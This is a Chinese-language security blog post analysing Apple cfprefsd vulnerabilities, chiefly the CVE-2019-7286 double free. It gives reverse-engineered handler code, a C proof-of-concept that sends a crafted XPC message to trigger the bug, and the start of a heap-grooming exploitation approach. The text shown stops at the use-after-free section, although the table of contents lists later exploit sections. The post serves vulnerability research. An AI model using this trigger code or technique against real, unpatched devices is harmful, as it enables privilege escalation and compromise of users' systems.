<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"buffer0verflooow.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="本文章汇总整理一下在cfprefsd中出现的漏洞。 前言cfprefsd是什么cfprefsd是CoreFoundation中的一个XPC服务，它能够通过用户请求读写偏好文件(即plist)。cfprefsd通常有两个运行的实例，一个负责以用户权限运行的应用程序设置首选项；另一个以root身份运行，负责系统范围的设置首选项。任何进程都可以打开与两个cfprefsd进程中的任何一个的XPC连接。 c">
<meta property="og:type" content="article">
<meta property="og:title" content="Apple cfprefsd漏洞">
<meta property="og:url" content="https://buffer0verflooow.github.io/2021/12/15/Apple-cfprefsd%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="buffer0verflooow - Blog">
<meta property="og:description" content="本文章汇总整理一下在cfprefsd中出现的漏洞。 前言cfprefsd是什么cfprefsd是CoreFoundation中的一个XPC服务，它能够通过用户请求读写偏好文件(即plist)。cfprefsd通常有两个运行的实例，一个负责以用户权限运行的应用程序设置首选项；另一个以root身份运行，负责系统范围的设置首选项。任何进程都可以打开与两个cfprefsd进程中的任何一个的XPC连接。 c">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://1.bp.blogspot.com/-47GnhJdhCx8/XWgi-xKfCOI/AAAAAAAANSU/7DRaHOJNZyomgFByAHrWqfsRbVgDA55kgCEwYBhgL/s1600/cfprefsd%2Bfake%2Bselector%2Bcache%2B-%2BHI_RES.png">
<meta property="article:published_time" content="2021-12-15T13:26:42.000Z">
<meta property="article:modified_time" content="2022-10-11T12:54:39.101Z">
<meta property="article:author" content="buffer0verflooow">
<meta property="article:tag" content="ios">
<meta property="article:tag" content="macos">
<meta property="article:tag" content="cfprefsd">
<meta property="article:tag" content="logic vul">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://1.bp.blogspot.com/-47GnhJdhCx8/XWgi-xKfCOI/AAAAAAAANSU/7DRaHOJNZyomgFByAHrWqfsRbVgDA55kgCEwYBhgL/s1600/cfprefsd%2Bfake%2Bselector%2Bcache%2B-%2BHI_RES.png">


<link rel="canonical" href="https://buffer0verflooow.github.io/2021/12/15/Apple-cfprefsd%E6%BC%8F%E6%B4%9E/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://buffer0verflooow.github.io/2021/12/15/Apple-cfprefsd%E6%BC%8F%E6%B4%9E/","path":"2021/12/15/Apple-cfprefsd漏洞/","title":"Apple cfprefsd漏洞"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>Apple cfprefsd漏洞 | buffer0verflooow - Blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">buffer0verflooow - Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/home/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#cfprefsd%E6%98%AF%E4%BB%80%E4%B9%88"><span class="nav-number">1.1.</span> <span class="nav-text">cfprefsd是什么</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%A1%E6%81%AF"><span class="nav-number">2.</span> <span class="nav-text">漏洞信息</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2019-7286"><span class="nav-number">2.1.</span> <span class="nav-text">CVE-2019-7286</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#POC"><span class="nav-number">2.1.1.</span> <span class="nav-text">POC</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-ZecOps"><span class="nav-number">2.1.2.</span> <span class="nav-text">漏洞利用 - ZecOps</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">2.1.2.1.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Double-Free%E8%BD%ACUse-After-Free"><span class="nav-number">2.1.2.2.</span> <span class="nav-text">Double-Free转Use-After-Free</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8E%A7%E5%88%B6PC"><span class="nav-number">2.1.2.3.</span> <span class="nav-text">控制PC</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-PZ"><span class="nav-number">2.1.3.</span> <span class="nav-text">漏洞利用 - PZ</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="nav-number">2.1.3.1.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8E%A7%E5%88%B6PC-1"><span class="nav-number">2.1.3.2.</span> <span class="nav-text">控制PC</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2020-9839"><span class="nav-number">2.2.</span> <span class="nav-text">CVE-2020-9839</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2021-1815"><span class="nav-number">2.3.</span> <span class="nav-text">CVE-2021-1815</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP"><span class="nav-number">2.3.1.</span> <span class="nav-text">EXP</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="nav-number">3.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">buffer0verflooow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">56</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">51</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://buffer0verflooow.github.io/2021/12/15/Apple-cfprefsd%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="buffer0verflooow">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="Apple cfprefsd漏洞 | buffer0verflooow - Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Apple cfprefsd漏洞
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-12-15 21:26:42" itemprop="dateCreated datePublished" datetime="2021-12-15T21:26:42+08:00">2021-12-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2022-10-11 20:54:39" itemprop="dateModified" datetime="2022-10-11T20:54:39+08:00">2022-10-11</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>本文章汇总整理一下在<strong>cfprefsd</strong>中出现的漏洞。</p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><h2 id="cfprefsd是什么"><a href="#cfprefsd是什么" class="headerlink" title="cfprefsd是什么"></a>cfprefsd是什么</h2><p>cfprefsd是CoreFoundation中的一个XPC服务，它能够通过用户请求读写偏好文件(即plist)。cfprefsd通常有两个运行的实例，一个负责以用户权限运行的应用程序设置首选项；另一个以root身份运行，负责系统范围的设置首选项。任何进程都可以打开与两个cfprefsd进程中的任何一个的XPC连接。</p>
<p>cfprefsd没有被沙箱隔离，因此可以从应用程序和WebContent沙箱直接访问。</p>
<p>cfprefsd二进制文件是一个Stub，主要是包含CoreFoundation框架中的CFXPreferencesDaemon_main的一个分支。CFXPreferencesDaemon_main分配一个CFPrefsDaemon对象，该对象创建一个在默认并发队列上进行监听的一个com.apple.cfprefsd.daemon（XPC服务），为每一个传入连接提供一个replyHandler来执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">[CFPrefsDaemon initWithRole:role testMode] &#123;</span><br><span class="line">  ...</span><br><span class="line">  listener =</span><br><span class="line">    xpc_connection_create_mach_service(&quot;com.apple.cfprefsd.daemon&quot;,</span><br><span class="line">                                       0,</span><br><span class="line">                                       XPC_CONNECTION_MACH_SERVICE_LISTENER);</span><br><span class="line">  // 事件处理</span><br><span class="line">  xpc_connection_set_event_handler(listener, ^(xpc_object_t peer) &#123;</span><br><span class="line">    if (xpc_get_type(peer) == XPC_TYPE_CONNECTION) &#123;</span><br><span class="line">      // 处理 XPC_TYPE_CONNECTION</span><br><span class="line">      xpc_connection_set_event_handler(peer, ^(xpc_object_t obj) &#123;</span><br><span class="line">        if (xpc_get_type(obj) == XPC_TYPE_DICTIONARY) &#123;</span><br><span class="line">          context_obj = xpc_connection_get_context(peer);</span><br><span class="line">          cfprefsd = context_obj.cfprefsd;</span><br><span class="line">          [cfprefsd handleMessage:obj fromPeer:peer replyHandler:</span><br><span class="line">            ^(xpc_object_t reply)</span><br><span class="line">            &#123;</span><br><span class="line">              xpc_connection_send_message(peer, reply);</span><br><span class="line">            &#125;];</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      // 队列</span><br><span class="line">      char label[0x80];</span><br><span class="line">      pid_t pid = xpc_connection_get_pid(peer)</span><br><span class="line">      dispatch_queue_t queue;</span><br><span class="line">      int label_len = snprintf(label, 0x80, &quot;Serving PID %d&quot;, pid);</span><br><span class="line">      if (label_len &gt; 0x7e) &#123;</span><br><span class="line">        queue = NULL;</span><br><span class="line">      &#125; else &#123;</span><br><span class="line">        queue = dispatch_queue_create(label, NULL);</span><br><span class="line">      &#125;</span><br><span class="line">      xpc_connection_set_target_queue(peer, queue);</span><br><span class="line"></span><br><span class="line">      context_obj = [[CFPrefsClientContext alloc] init];</span><br><span class="line">      context_obj.lock = 0;</span><br><span class="line">      context_obj.cfprefsd = self; // the CFPrefsDaemon object</span><br><span class="line">      context_obj.isPlatformBinary = -1; // char</span><br><span class="line">      context_obj.valid = 1;</span><br><span class="line">      xpc_connection_set_context(peer, context_obj);</span><br><span class="line">      xpc_connection_set_finalizer(peer, client_context_finalizer)</span><br><span class="line">      xpc_connection_resume(peer);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h1><h2 id="CVE-2019-7286"><a href="#CVE-2019-7286" class="headerlink" title="CVE-2019-7286"></a>CVE-2019-7286</h2><blockquote>
<p>在iOS 12.1.4中修复，适用于iPhone 5s 及更新机型、iPad Air 及更新机型以及第 6 代 iPod touch</p>
</blockquote>
<p>如前言中所述，cfprefsd是通过[CFPrefsDaemon handleMessage:fromPeer:replyHandler:]来处理传入连接的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">-[CFPrefsDaemon handleMessage:msg fromPeer:peer replyHandler: handler] &#123;</span><br><span class="line">  if (xpc_get_type(msg) == XPC_TYPE_ERROR) &#123;</span><br><span class="line">    [self handleError:msg]</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">    xpc_dictionary_get_value(msg, &quot;connection&quot;, peer);</span><br><span class="line">    uint64_t op = xpc_dictionary_get_uint64(msg, &quot;CFPreferencesOperation&quot;);</span><br><span class="line">    switch (op) &#123;</span><br><span class="line">     case 1:</span><br><span class="line">     case 7:</span><br><span class="line">     case 8:</span><br><span class="line">      [self handleSourceMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     case 2:</span><br><span class="line">      [self handleAgentCheckInMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     case 3:</span><br><span class="line">      [self handleFlushManagedMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     case 4:</span><br><span class="line">      [self handleFlushSourceForDomainMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     case 5:</span><br><span class="line">      [self handleMultiMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     case 6:</span><br><span class="line">      [self handleUserDeletedMessage:msg replyHandler:handler];</span><br><span class="line">      break;</span><br><span class="line">     default:</span><br><span class="line">      // send error reply</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>问题出在case 5: handleMultiMessage上，处理xpc_array类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line">-[CFPrefsDaemon handleMultiMessage:msg replyHandler: handler]</span><br><span class="line">&#123;</span><br><span class="line">  xpc_object_t peer = xpc_dictionary_get_remote_connection(msg);</span><br><span class="line">  // ...</span><br><span class="line">  xpc_object_t messages = xpc_dictionary_get_value(msg, &quot;CFPreferencesMessages&quot;);</span><br><span class="line">  if (!messages || xpc_get_type(messages) != OS_xpc_array) &#123;</span><br><span class="line">    // send error message</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  // 如果只包含dictionaries或null, 直接返回</span><br><span class="line">  bool all_types_valid = xpc_array_apply(messages, ^(xpc_object_t entry) &#123;</span><br><span class="line">    xpc_type_t type = xpc_get_type(entry);</span><br><span class="line">    return (type == XPC_TYPE_DICTIONARY || type == XPC_TYPE_NULL)</span><br><span class="line">  &#125;;</span><br><span class="line"></span><br><span class="line">  if (!all_types_valid) &#123;</span><br><span class="line">    // return error</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  size_t n_sub_messages = xpc_array_get_count(messages);</span><br><span class="line"></span><br><span class="line">  // macro from CFInternal.h</span><br><span class="line">  // allocates either on the stack or heap</span><br><span class="line">  new_id_array(sub_messages, n_sub_messages);</span><br><span class="line"></span><br><span class="line">  if (n_sub_messages &gt; 0) &#123;</span><br><span class="line">    for (size_t i = 0; i &lt; n_sub_messages; i++) &#123;</span><br><span class="line">      // raw pointers, not holding a reference</span><br><span class="line">      sub_messages[i] = xpc_array_get_value(messages, i);  // &lt;--- 1</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    for (size_t i = 0; i &lt; n_sub_messages; i++) &#123;</span><br><span class="line">      if (xpc_get_type(sub_messages[i]) == XPC_TYPE_DICTIONARY) &#123;</span><br><span class="line">        [self handleMessage: sub_messages[i]  // &lt;--- 2</span><br><span class="line">              fromPeer: peer</span><br><span class="line">              replyHandler: ^(xpc_object_t reply) &#123;</span><br><span class="line">                sub_messages[i] = xpc_retain(reply);  // &lt;--- 3</span><br><span class="line">              &#125;];</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  xpc_object_t reply = xpc_dictionary_create_reply(msg);  // &lt;--- 4</span><br><span class="line">  xpc_object_t replies_arr = xpc_array_create(sub_messages, n_sub_messages);</span><br><span class="line">  xpc_dictionary_set_value(reply, &quot;CFPreferencesMessages&quot;, replies_arr);</span><br><span class="line"></span><br><span class="line">  xpc_release(replies_arr);</span><br><span class="line"></span><br><span class="line">  if (n_sub_messages) &#123;</span><br><span class="line">    for (size_t i = 0; i &lt; n_sub_messages; i++) &#123;</span><br><span class="line">      if (xpc_get_type(sub_messages[i]) != XPC_TYPE_NULL) &#123;</span><br><span class="line">        xpc_release(sub_messages[i]);  // &lt;--- 5</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  free_id_array(sub_messages);</span><br><span class="line"></span><br><span class="line">  handler(reply);</span><br><span class="line"></span><br><span class="line">  xpc_release(reply);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如上所示，在第1步中，适用xpc_array_get_value函数将内容从xpc_array中取出，放入sub_messages中。第2步，将sub_messages传给handleMessage()函数处理所有子消息。第3步，将sub_messages中的每一个值改变为reply消息（这是一个引用）。第4步，当所有的子消息被处理后，根据所有的回复中创建一个xpc_array，在59行调用相应的replyHandler，处理所有子消息的reply消息。</p>
<p>问题是，不是所有的消息类型都会有reply，就是指这些消息不会调用replyHandler函数。正如第3步中显示的那样，对于这些不reply的消息，一般采用的处理方式是NOP掉。通过查询开发者手册可知，xpc_release()函数将减少对象的引用，xpc_array_get_value()函数用于获取指定下标中的值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">xpc_release</span><br><span class="line">Decrements the reference count of an object.</span><br><span class="line"></span><br><span class="line">xpc_array_get_value(_:_:)</span><br><span class="line">Returns the value at the specified index in the array.</span><br></pre></td></tr></table></figure>

<p>这里设计的本意是通过xpc_retain()函数，改变sub_messages[i]中的值，也就是sub_messages[i]中的值变为了引用，这样后面在xpc_release()函数解引用时就能匹配上；否则，就会在释放<strong>CFPreferencesMessages</strong>数组时，由于引用已经被释放了，导致出现<strong>double-free</strong>。</p>
<h3 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h3><p>触发漏洞的键值：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">poc_dict = &#123;</span><br><span class="line">  <span class="string">&quot;CFPreferencesOperation&quot;</span> = 5,</span><br><span class="line">  <span class="string">&quot;CFPreferencesMessages&quot;</span> = [</span><br><span class="line">    &#123;</span><br><span class="line">     <span class="string">&quot;CFPreferencesOperation&quot;</span>: 4  </span><br><span class="line">    &#125;</span><br><span class="line">  ]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>具体POC：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> ;</span></span><br><span class="line"> </span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> * argv[])</span> &#123;</span><br><span class="line"> </span><br><span class="line">  <span class="type">xpc_connection_t</span> conn = xpc_connection_create_mach_service(<span class="string">&quot;com.apple.cfprefsd.daemon&quot;</span>,<span class="number">0</span>,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);</span><br><span class="line">  xpc_connection_set_event_handler(conn, ^(<span class="type">xpc_object_t</span> t) &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;got message: %sn&quot;</span>, xpc_copy_description(t));</span><br><span class="line">  &#125;);</span><br><span class="line"> </span><br><span class="line">  xpc_connection_resume(conn);</span><br><span class="line"> </span><br><span class="line">  <span class="type">xpc_object_t</span> hello = xpc_dictionary_create(<span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">  xpc_dictionary_set_int64(hello, <span class="string">&quot;CFPreferencesOperation&quot;</span>, <span class="number">5</span>);</span><br><span class="line"> </span><br><span class="line">  <span class="type">xpc_object_t</span> arr = xpc_array_create(<span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="type">xpc_object_t</span> arr_elem1 = xpc_dictionary_create(<span class="literal">NULL</span>, <span class="literal">NULL</span>, <span class="number">0</span>);</span><br><span class="line">  xpc_dictionary_set_int64(arr_elem1, <span class="string">&quot;CFPreferencesOperation&quot;</span>, <span class="number">4</span>);</span><br><span class="line"> </span><br><span class="line">  xpc_array_append_value(arr, arr_elem1);</span><br><span class="line">  xpc_dictionary_set_value(hello, <span class="string">&quot;CFPreferencesMessages&quot;</span>, arr);</span><br><span class="line">  xpc_connection_send_message(conn, hello);</span><br><span class="line">  xpc_release(hello);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="漏洞利用-ZecOps"><a href="#漏洞利用-ZecOps" class="headerlink" title="漏洞利用 - ZecOps"></a>漏洞利用 - ZecOps</h3><h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>这里使用两个线程，一个用于触发漏洞，一个用于填充内存空间。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">+----------------+       +---------------+</span><br><span class="line">|   vul_thread   |       |  fill_thread  |</span><br><span class="line">|                |       |               |</span><br><span class="line">| +------------+ |       |               |</span><br><span class="line">| | first free | |       |               |</span><br><span class="line">| |            | |       |               |</span><br><span class="line">| +-----+------+ |       |               |</span><br><span class="line">|       |        |       |  +----------+ |</span><br><span class="line">|       |        |       |  | allocate | |</span><br><span class="line">|       +&lt;------------------+          | |</span><br><span class="line">|       |        |       |  +----------+ |</span><br><span class="line">| +-----v------+ |       |               |</span><br><span class="line">| | double free| |       |               |</span><br><span class="line">| |            | |       |               |</span><br><span class="line">| +------------+ |       |               |</span><br><span class="line">|                |       |               |</span><br><span class="line">+----------------+       +---------------+</span><br></pre></td></tr></table></figure>

<h4 id="Double-Free转Use-After-Free"><a href="#Double-Free转Use-After-Free" class="headerlink" title="Double-Free转Use-After-Free"></a>Double-Free转Use-After-Free</h4><p>两次 xpc_release 之间的时间窗口会很短，由于XPC请求是可控的，我们可以创建一个很大的xpc_array，来获取足够的时间窗口去填充释放的内存。</p>
